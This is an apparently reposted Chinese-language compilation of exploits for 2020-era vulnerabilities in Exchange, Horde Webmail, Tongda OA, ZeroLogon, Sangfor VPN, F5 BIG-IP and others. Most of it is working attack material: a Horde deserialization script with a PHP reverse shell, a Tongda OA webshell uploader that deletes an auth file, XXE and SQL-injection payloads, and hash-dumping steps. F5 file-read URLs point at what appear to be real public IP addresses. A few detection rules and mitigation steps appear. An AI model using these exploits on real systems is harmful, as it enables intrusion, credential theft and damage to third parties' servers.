來源: https://mp.weixin.qq.com/s/3ZjwFo5gWlJACSkeYWQLXA前段時間在朋友圈和微信群裡火熱不行的寶塔資料庫面板未授權無需登入,以下是存在安全問題的版本。- Linux正式版7.4.2- Linux測試版7.5.13- Windows正式版6.81、寶塔預設phpMyadmin埠就是888 而這個漏洞排查方式極其簡單 172.10.0.121:888/pma2、如果寶塔是存在安全問題的版本,那就會直接出現phpMyadmin面板頁面。

二十四、CVE-2020-16875:ExchangeServer遠端程式碼執行漏洞更新公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875微軟公告說的很明顯,只需要一個Exchange使用者賬號。就能在Exchange伺服器上執行任意命令。https://srcincite.io/pocs/cve-2020-16875.py.txthttps://srcincite.io/pocs/cve-2020-16875.ps1.txt

researcher@incite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123### mspaint

researcher@incite:~$ ./poc.py 192.168.75.142 [email protected]:user123### mspaint
(+) logged in as [email protected]
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5

(+) triggered rce as SYSTEM!

Microsoft Exchange遠端程式碼執行(CVE-2020-16875):
Microsoft Exchange伺服器中存在一個遠端執行程式碼漏洞。成功利用此漏洞的攻擊者可以在系統使用者的上下文中執行任意程式碼。利用此漏洞需要擁有以某個Exchange角色進行身份驗證的使用者許可權。
該漏洞影響版本:
microsoft:exchange_server_2016: cu16/cu17
microsoft:exchange_server_2019: cu5/cu6

MSF利用（https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb):
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
[*] Logging in to OWA with creds Administrator:Passw0rd!
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
[*] Powershell command length: 2372
[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer    : WIN-365Q2VJJS17
OS       : Windows 2016+ (10.0 Build 14393).
Architecture  : x64
System Language : en_US
Domain     : GIBSON
Logged On Users : 8
Meterpreter  : x64/windows
meterpreter >

二十五、PhpStudy nginx解析漏洞
小皮面板 <= 8.1.0.7，其實這個漏洞確實不是phpstudy的問題,而是2017年就出現的nginx解析漏洞。1、利用條件就只需要把php惡意檔案上傳(oss不算!)到伺服器。<?php phpinfo();?>2、通過 /x.txt/x.php 方式訪問上傳的圖片地址,啪嚓! 就解析了php程式碼。
二十六、Apache Cocoon XML注入 [CVE-2020-11991]
來源:http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author程式使用了StreamGenerator這個方法時,解析從外部請求的xml資料包未做相關的限制,惡意使用者就可以構造任意的xml表示式,使伺服器解析達到XML注入的安全問題。1、漏洞利用條件有限必須是apacheCocoon且使用了StreamGenerator,也就是說只要傳輸的資料被解析就可以實現了。2、利用POC:

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>

</userInfo>

二十七、Horde Groupware Webmail Edition 遠端命令執行

來源: https://srcincite.io/pocs/zdi-20-1051.py.txt

#!/usr/bin/env python3
"""
Horde Groupware Webmail Edition Sort sortpref Deserialization of Untrusted Data Remote Code Execution Vulnerability

Identifiers: ZDI-CAN-10436 / ZDI-20-1051
Found by ..: mr_me
Tested on .: Horde Groupware Webmail 5.2.22 (pear installation) on Debian 9 Stretch w/ Apache/2.4.25 & PHP 7.0.33

Summary:
========

It's possible to reach a deserialization of untrusted data vulnerability within the constructor of the IMP_Prefs_Sort class. A low privileged authenticated attacker can leverage this to achieve remote code execution.

Example:
========

saturn:~ mr_me$ ./poc.py 
(+) usage ./poc.py <target> <path> <user:pass> <connectback:port>
(+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337

saturn:~ mr_me$ ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337
(+) targeting http://172.16.175.145/horde/
(+) obtained session iefankvohbl8og0mtaadm3efb6
(+) inserted our php object
(+) triggering deserialization...
(+) starting handler on port 1337
(+) connection from 172.16.175.145
(+) pop thy shell!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/horde/services
uname -a
Linux target 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux
exit
*** Connection closed by remote host ***
(+) repaired the target!
"""

import re
import sys
import socket
import requests
import telnetlib
import base64
from threading import Thread

def rs(cbh, cbp):
    return """@error_reporting(-1);
@set_time_limit(0); 
@ignore_user_abort(1);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
    $dis=preg_replace('/[, ]+/', ',', $dis);
    $dis=explode(',', $dis);
    $dis=array_map('trim', $dis);
}else{
    $dis=array();
}
$ipaddr='%s';
$port=%d;
function PtdSlhY($c){
    global $dis; 
    if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
        $c=$c." 2>&1\\n";
    }
    ob_start();
    system($c);
    $o=ob_get_contents();
    ob_end_clean();
    if (strlen($o) === 0){
        $o = "NULL";
    }
    return $o;
}
$nofuncs='no exec functions';
$s=@fsockopen("tcp://$ipaddr",$port);
while($c=fread($s,2048)){
    $out = '';
    if(substr($c,0,3) == 'cd '){
        chdir(substr($c,3,-1));
    }else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
        break;
    }else{
        $out=PtdSlhY(substr($c,0,-1));
        if($out===false){
            fwrite($s, $nofuncs);
            break;
        }
    }
    fwrite($s,$out);
}
fclose($s);""" % (cbh, cbp)

def get_session(t, p, usr, pwd):
    uri = "http://%s%slogin.php" % (t, p)
    p = {
        "login_post" : 1337,
        "horde_user" : usr,
        "horde_pass" : pwd
    }
    r = requests.post(uri, data=p, allow_redirects=False)
    match = re.findall("Horde=(.{26});", r.headers['set-cookie'])
    assert len(match) == 2, "(-) failed to login"
    return match[1]

def trigger_deserialization(t, p, s, host, port):
    """ Object instantiation to reach the deserialization """
    handlerthr = Thread(target=handler, args=(port,))
    handlerthr.start()
    uri = "http://%s%sservices/ajax.php/imp/imple" % (t, p)
    p = {
        "imple" : "IMP_Prefs_Sort",
        "app" : "imp",
    }
    h = { "cmd" : base64.b64encode(rs(host, port).encode()) }
    c = { "Horde" : s }
    r = requests.get(uri, params=p, cookies=c, headers=h)
    match = re.search("horde_logout_token=(.*)&", r.text)
    assert match, "(-) failed to leak the horde_logout_token!"
    p['token'] = match.group(1)
    r = requests.get(uri, params=p, cookies=c, headers=h)
    assert r.status_code == 200, "(-) failed to trigger deserialization!"

def get_pop():
    """ An updated pop chain """
    pop  = 'O:34:"Horde_Kolab_Server_Decorator_Clean":2:{'
    pop += 'S:43:"\\00Horde_Kolab_Server_Decorator_Clean\\00_server";O:20:"Horde_Prefs_Identity":3:{'
    pop += 'S:9:"\\00*\\00_prefs";O:11:"Horde_Prefs":2:{'
    pop += 'S:8:"\\00*\\00_opts";a:1:{'
    pop += 's:12:"sizecallback";a:2:{i:0;O:12:"Horde_Config":1:{'
    pop += 'S:13:"\\00*\\00_oldConfig";s:44:"eval(base64_decode($_SERVER[HTTP_CMD]));die;";'
    pop += '}i:1;s:13:"readXMLConfig";}}'
    pop += 'S:10:"\\00*\\00_scopes";a:1:{'
    pop += 's:5:"horde";C:17:"Horde_Prefs_Scope":10:{[null,[1]]}}}'  # implements Serializable using custom unserialize/serialize
    pop += 'S:13:"\\00*\\00_prefnames";a:1:{s:10:"identities";i:0;}'
    pop += 'S:14:"\\00*\\00_identities";a:1:{i:0;i:0;}}'             # additional checks
    pop += 'S:42:"\\00Horde_Kolab_Server_Decorator_Clean\\00_added";a:1:{i:0;i:0;}}'
    return pop

def get_patch():
    """ Our original array """
    patch  = 'a:1:{'
    patch += 's:5:"INBOX";a:1:{'
    patch += 's:1:"b";i:6;'
    patch += '}}'
    return patch

def set_pref(t, p, s, k, o):
    """ A primitive that inserts a string into the database """
    uri = "http://%s%sservices/ajax.php/imp/setPrefValue" % (t, p)
    p = {
        "pref" : k,
        "value" : o,
    }
    c = { "Horde" : s }
    r = requests.get(uri, params=p, cookies=c)
    match = re.search("horde_logout_token=(.*)&", r.text)
    assert match, "(-) failed to leak the horde_logout_token!"
    p['token'] = match.group(1)
    r = requests.get(uri, params=p, cookies=c)
    assert ("\"response\":true" in r.text and r.status_code == 200), "(-) failed to set the preference!"

def handler(lport):
    print("(+) starting handler on port %d" % lport)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    conn, addr = s.accept()
    print("(+) connection from %s" % addr[0])
    t.sock = conn
    print("(+) pop thy shell!")
    t.interact()

def fix_path(p):
    if p == "/":
        return p
    if not p.startswith("/"):
        p = "/%s" % p
    if not p.endswith("/"):
        p = "%s/" % p
    return p

def main():
    if len(sys.argv) < 5:
        print("(+) usage %s <target> <path> <user:pass> <connectback:port>" % sys.argv[0])
        print("(+) eg: %s 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337" % sys.argv[0])
        sys.exit(0)
    target = sys.argv[1]
    path   = fix_path(sys.argv[2])
    user   = sys.argv[3].split(":")[0]
    pswd   = sys.argv[3].split(":")[1]
    host   = sys.argv[4].split(":")[0]
    port   = int(sys.argv[4].split(":")[1])
    print("(+) targeting http://%s%s" % (target, path))
    session = get_session(target, path, user, pswd)
    print("(+) obtained session %s" % session)
    set_pref(target, path, session, 'sortpref', get_pop())
    print("(+) inserted our php object")
    print("(+) triggering deserialization...")
    trigger_deserialization(target, path, session, host, port)
    set_pref(target, path, session, 'sortpref', get_patch())
    print("(+) repaired the target!")

if __name__ == "__main__":
    main()

saturn:~$./poc.py 172.16.175.148/horde/ hordeuser:pass123 172.16.175.145

(+) targeting http://172.16.175.145/horde/

(+) obtained session iefankvohbl8og0mtaadm3efb6

(+) inserted our php object

(+) triggering deserialization...

(+) starting handler on port 1337

(+) connection from 172.16.175.145

(+) pop thy shell!

uid=33(www-data) gid=33(www-data) groups=33(www-data)

pwd

/var/www/horde/services

二十八、通達OA任意使用者登入

1、首先訪問 /ispirit/login_code.php 獲取 codeuid。

2、訪問 /general/login_code_scan.php 提交 post 引數：

uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

3、最後訪問 /ispirit/login_code_check.php?codeuid=xxx

這樣 $_SESSION 裡就有了登入的資訊了。

二十九、通達OA v11.7 後臺SQL注入

利用條件:需要登入許可權,文章作者給出了利用鏈注入加mysql許可權,又是寫木馬的。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、新增一個mysql使用者

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

2、給建立的ateam666賬戶新增mysql許可權。

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));

3、重新整理資料庫就可以登入到資料庫啦。

/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

4、通達OA配置mysql預設是不開啟外網訪問的所以需要修改mysql授權登入。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

5、接下來就是考驗mysql提權功底的時候啦 233...

來源:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

三十、Wordpress File-manager外掛任意檔案上傳

相信大家對Wordpress並不陌生;File-manager外掛也是相當火爆前段時間爆出任意檔案上傳漏洞。

成功上傳後文件訪問路徑

/wordpress/wp-content/plugins/wp-file-manager/lib/files/shell.php

參考:https://www.anquanke.com/post/id/216990

三十一、Pligg CMS遠端程式碼執行[CVE-2020-25287]

漏洞非常雞肋需要登入後臺、受影響Pligg2.0.3版本。

1、模版編輯器功能可以編輯任意檔案內容,在檔案中加入惡意程式碼導致程式碼執行。

參考：https://github.com/jenaye/pligg

三十二、ZeroLogon接管域控許可權漏洞[CVE-2020-1472]

1. 元件概述

Netlogon遠端協議是一個遠端過程呼叫（RPC）介面，用於基於域的網路上的使用者和計算機身份驗證。Netlogon遠端協議RPC介面還用於為備份域控制器（BDC）複製資料庫。

Netlogon遠端協議用於維護從域成員到域控制器（DC），域的DC之間以及跨域的DC之間的域關係。此RPC介面用於發現和管理這些關係。

2. 漏洞介紹

該漏洞主要是由於在使用Netlogon安全通道與域控進行連線時，由於認證協議加密部分的缺陷，導致攻擊者可以將域控管理員使用者的密碼置為空，從而進一步實現密碼hash獲取並最終獲得管理員許可權。成功的利用可以實現以管理員許可權登入域控裝置，並進一步控制整個域。

3. 漏洞影響

• Microsoft Windows Server 2008 R2 SP1

• Microsoft Windows Server 2012
• Microsoft Windows Server 2012 R2
• Microsoft Windows Server 2016
• Microsoft Windows Server 2019
• Microsoft Windows Server version 2004 (Server Core Installation)
• Microsoft Windows Server version 1903 (Server Core Installation)

• Microsoft Windows Server version 1909 (Server Core Installation)

4. 解決方案

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

5.漏洞復現攻擊主機：kali受害者主機名：owa.rootkit.org(window2008）1.使用Impacket庫驗證Zerologon（CVE-2020-1472）Python指令碼（https://github.com/SecuraBV/CVE-2020-1472）將嘗試執行Netlogon身份驗證繞過。成功執行完後時，指令碼將立即終止，並且不執行任何Netlogon操作需要Python 3.7以上版本以及pippip install -r requirements.txt前提條件需要用到Impacket庫https://github.com/SecureAuthCorp/impacketpython3 setup.py install //安裝impacket執行指令碼:執行的指令碼目標名稱可以是主DC或輔助DC。給定EXAMPLE-DC的主機名以及DC的IP：./zerologon_tester.py EXAMPLE-DC DC的IP./zerologon_tester.py OWA 192.168.1.104如果存在漏洞，會返回資訊：Success! DC can be fully compromised by a Zerologon attack2.使用cve-2020-1472-exploit.py進行攻擊（測試域控制器是否容易受到Zerologon攻擊。當受到攻擊時，將DC帳戶密碼重置為空字串）前提條件需要用到Impacket庫：https://github.com/SecureAuthCorp/impacketgit clone https://github.com/SecureAuthCorp/impacket.gitpython3 setup.py install //安裝impacket執行指令碼https://github.com/dirkjanm/CVE-2020-1472python3 cve-2020-1472-exploit.py owa 192.168.1.104如果利用漏洞成功，則會提示：vulnerable, changing account password to empty string3、使用impacket的secretsdump.py遠端匯出域控制上的hashpython3 secretsdump.py rootkit.org/owa\[email protected] -no-pass4、利用獲取到的管理員hash,通過impacket的wmiexec.py來遠端操作域控伺服器,獲取域控的終端命令視窗python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b rootkit.org/[email protected]、獲取管理員hash，遠端連線匯出sam資料庫中的原來的計算機hashreg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\security security.saveget system.saveget sam.saveget security.savepython3 secretsdump.py -sam sam.save -system system.save -security security.save LOCALdel /f system.savedel /f sam.savedel /f security.save注意：這裡會獲得一個賬號名為：$MACHINE:ACC賬號的hash值，注意hash的後半6、恢復計算機的hash下載指令碼 https://github.com/risksense/zerologonpython3 reinstall_original_pw.py owa 192.168.1.104 ad611ebf4fd2de9448a33ba693b212f4 //注意hash的部分，只有後半部分如果還原密碼成功則會顯示：Success! DC machine account should be restored to it\'s original value. You might want to secretsdump again to check7、恢復計算機的hash使用impacket的指令碼來登入域控來驗證hashpython3 secretsdump.py rootkit.org/administrator:[email protected] -just-dc-user owa\$使用7步驟的腳本回復hash前python3 reinstall_original_pw.py owa 192.168.1.104 ad611ebf4fd2de9448a33ba693b212f4 //注意hash的部分，只有後半部分python restorepassword.py rootkit.org/[email protected] -target-ip 192.168.1.104 -hexpass aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b通過mimikatz中CVE-2020-1472功能攻擊ActiveDirectory的三步驟：# lsadump::dcsync /domain:LAB.LOCAL /dc:dc.lab.local /user:krbtg t /authuser:dc$ /authdomain:LAB /authpassword:"" /authntlm# lsadump::zerologon /target:dc.lab.local /account:dc$# lsadump::zerologon /target:dc.lab.local /account:dc$ /exploit#lsadump::dcsync#lsadump::postzerologon /target:dc.lab.local /account:dc$ #恢復密碼snort檢測規則：

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

Windows事件管理器自查：在未打補丁的域控，重點檢視windows事件管理器中，eventid為4742或者4624，5805在Windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。藍隊可以重點關注這幾個事件ID以方便自查

當在初始部署階段允許存在突破的Netlogon安全通道連線時，將生成事件ID 5829。
管理員可以監控事件ID 5827和5828，這些事件ID在存在漏洞的Netlogon連線被拒絕時觸發
5830，5831如果“域控制器：允許易受攻擊的Netlogon安全通道連線”組策略允許連線。

mimikatz通過zerologon攻擊成功後，將會留下事件id為4648。

參考文獻：https://mp.weixin.qq.com/s/xq6gwgomkE0ru3lR3EmDaw https://mp.weixin.qq.com/s/nRKuFAD-ev9k5icUmYdkvg https://asciinema.org/a/359607 https://www.t00ls.net/articles-57858.html https://mp.weixin.qq.com/s/HoyMVPtdajGKGFsXxR_SfA

通過mimikatz中CVE-2020-1472功能攻擊ActiveDirectory的三步驟：# lsadump::dcsync /domain:LAB.LOCAL /dc:dc.lab.local /user:krbtg t /authuser:dc$ /authdomain:LAB /authpassword:"" /authntlm# lsadump::zerologon /target:dc.lab.local /account:dc$# lsadump::zerologon /target:dc.lab.local /account:dc$ /exploit濫用Zerologon的另一種方式（CVE-2020-1472）：ntlmrelayx.py --no-http-server -smb2support -t DCSYNC://dc.lab.localmimikatz#misc::spooler /server:dc-bis.lab.local /connect:debian.labsec.local

三十三、ThinkAdminV6 任意檔案操作

Update.php 三個函式未校驗訪問許可權

1、目錄遍歷注意POST資料包rules引數值需要URL編碼

POST /admin.html?s=admin/api.Update/node

rules=%5B%22.%2F%22%5D

2、檔案讀取,後面那一串是UTF8字串加密後的結果。計算方式在Update.php中的加密函式。

/admin.html?s=admin/api.Update/get/encode/

34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

三十四、CVE-2020-1181：SharePoint遠端程式碼執行

）在演示場景中，我們使用的版本為替代配置的Microsoft SharePoint 2019 Server，安裝在Windows Server 2019 Datacenter系統上。伺服器主機稱為sp2019.contoso.lab，已加入contoso.lab域中，域控制器為一臺獨立的虛擬機器。目標主機已安裝終止2020年2月份的所有補丁，因此對應的版本號為16.0.10355.20000。

攻擊系統中只需要使用支援的Web瀏覽器即可。如下圖所示，我們使用的瀏覽器為Mozilla Firefox 69.0.3。我們將使用與前文類似的WikiContentWebpart，將其命名為WikiContentRCE.xml。

1.首先我們訪問SharePoint Server，以普通使用者（user2）通過身份認證：

2.接下來建立站點，使該使用者變成該站點所有者（所有者），具有所有許可權。（前提條件普通使用者具有建立站點的許可權）

點選頂部面板的“ SharePoint”區域：

然後點選“+建立網站”連結：

選擇“Team Site”。現在我們需要為新站點設定名稱，這裡我們設定為testsiteofuser2。

點選“完成”，成功建立新站點：

現在點選“Pages”連結：

我們需要切換到“Classic View”，單擊左下角的“Return to classic SharePoint”連結即可：

點選“+ New”，為新頁面設定一個名稱。這裡我們設定為newpage1：

點選“建立”按鈕確認。

現在我們需要在“INSERT”標籤頁中選擇“Web Part”：

在上方視窗中，選擇左下角的“Upload Web Part”連結，上傳我們構造的WikiContentRCE.xml檔案：

點選上傳。我們可能會看到一個警告彈窗：“確認離開頁面？您輸入的資料可能不會被儲存”。此時點選“離開頁面”按鈕即可，返回主編輯檢視：

我們需要再次在INSERT標籤頁中選擇Web部件小部件，其中將出現我們引入的Web部件：

在點選新增按鈕之前，我們先轉到目標SharePoint伺服器，開啟C:\windows\temp目錄：

此時該目錄中不存在RCE_PoC.txt檔案。

現在我們轉到攻擊者主機，將我們引入的Web Part新增到頁面中：

再次在目標伺服器上檢查C:\windows\temp目錄：

通過這種方法，攻擊者可以執行任意系統命令，入侵伺服器。攻擊者只需要在WikiContentRCE.xml檔案中，將echo pwned > c:/windows/temp/RCE_PoC.txt串聯替換成所需的命令即可。

三十五、深信服SSL VPN任意密碼重置

深信服VPN加密演算法使用了預設的key,攻擊者構利用key構造重置密碼資料包從而修改任意使用者的密碼

利用:需要登入賬號

M7.6.6R1版本預設key為20181118

M7.6.1版本預設key為20100720

sangfor_key.py

from Crypto.Clipher import ARC4

from binascii import a2b_hex

def myRC4(data,key):

rc41=ARC4.new(key)

encrypted=rc41.encrypt(data)

return encrypted.encode('hex')

def rc4_decrpt_hex(data,key):

rc41=ARC4.new(key)

return rc41.decrypt(a2b_hex(data))

key='20200720'

data=r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'

print myRC4(data,key)

https://<PATH>/por/changepwd.csp(post)

sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR&len=(指令碼計算後結果)

三十六、深信服SSL VPN修改任意賬戶手機號

修改手機號介面未正確鑑權導致越權覆蓋任意使用者的手機號碼

利用:需要登入賬號

https://<PATH>/por/changetelnum.csp?apiversion=1

newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1

三十七、通達OA v11.6版本RCE漏洞一、影響版本 11.6

二、復現過程
1.下載11.6版本oa，下載地址：http://www.kxdw.com/soft/23114.html
2.安裝

3.exp指令碼

import requests

target="http://ip:port/" //此處填寫上面安裝oa的ip及埠

payload="<?php eval($_POST['hahaha']);?>"

print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")

input("Press enter to continue")

print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"

requests.get(url=url)

print("[*]Checking if file deleted...")

url=target+"/inc/auth.inc.php"

page=requests.get(url=url).text

if 'No input file specified.' not in page:

print("[-]Failed to deleted auth.inc.php")

exit(-1)

print("[+]Successfully deleted auth.inc.php!")

print("[*]Uploading payload...")

url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"

files = {'FILE1': ('deconf.php', payload)}

requests.post(url=url,files=files)

url=target+"/_deconf.php"

page=requests.get(url=url).text

if 'No input file specified.' not in page:

print("[+]Filed Uploaded Successfully")

print("[+]URL:",url)

else:

print("[-]Failed to upload file")

4.然後執行該exp的效果如下圖

5.用菜刀連線該後門，如下

https://github.com/TomAPU/poc_and_exp https://drivertom.blogspot.com/2019/06/pyspider-webuipocexp.htmlhttps://www.cnblogs.com/yuzly/p/13600532.htmlhttps://www.cnblogs.com/panisme/p/12560769.html

三十八、F5負載均衡：cve-2020-5902

版本影響：

BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5

遠端命令執行RCE:curl-v -k'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
https://43.247.102.140/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://43.247.102.142/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

檔案包含漏洞：https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://183.2.157.179/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://36.110.142.2/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://183.2.157.181/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://58.215.213.226/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://36.110.49.152/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://116.204.216.4/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://116.204.219.3/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://43.247.102.141/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://218.205.188.31/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://60.247.99.150/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://36.110.49.151//tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://111.198.181.151/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://220.248.87.92/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://43.247.102.142/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://183.2.157.180/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://43.247.102.140/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
臨時修補建議：官方建議可以通過以下步驟臨時緩解影響1.使用以下命令登入對應系統tmsh
2.編輯httpd元件的配置檔案
edit /sys httpd all-properties
3.檔案內容如下
include ' <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> '4.按照如下操作儲存檔案
按下 ESC 並依次輸入 :wq
5.執行命令重新整理配置檔案
save /sys config
6.重啟 httpd 服務
restart sys service httpd
7.並禁止外部IP對 TMUI 頁面的訪問

搜尋目標：注：請將下面的%26替換為&。shodan
http.favicon.hash:-335242539http.favicon.hash:-335242539 "3992"http.title:"BIG-IP%26reg;- Redirect"http.title:"BIG-IP®- Redirect"
fofa
title="BIG-IP%26reg;- Redirect"censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5443.https.get.title:"BIG-IP%26reg;- Redirect"google
inurl:"tmui/login.jsp"intitle:"BIG-IP" inurl:"tmui"登入頁面：https://<target>/tmui/login.jsp
漏洞檢測/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=a
https://github.com/yassineaboukir/CVE-2020-5902
https://github.com/jas502n/CVE-2020-5902
https://github.com/aqhmal/CVE-2020-5902-Scanner
https://github.com/nsflabs/CVE-2020-5902
https://github.com/yasserjanah/CVE-2020-5902
https://github.com/JSec1337/RCE-CVE-2020-5902
https://github.com/payloadbox/command-injection-payload-list

suricataCVE-2020-5902 檢測規則：alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt"; flow:established,to_server; http.uri; content:"/tmui/login.jsp/..|3b|/"; depth:20; metadata: former_category EXPLOIT; reference:cve,2020-5902; reference:url,support.f5.com/csp/article/K52145254; classtype:attempted-admin; sid:2030469; rev:3; metadata:affected_product Web_Server_Applications, attack_target Web_Server, deployment Perimeter, signature_severity Critical, created_at 2020_07_05, updated_at 2020_07_05;)

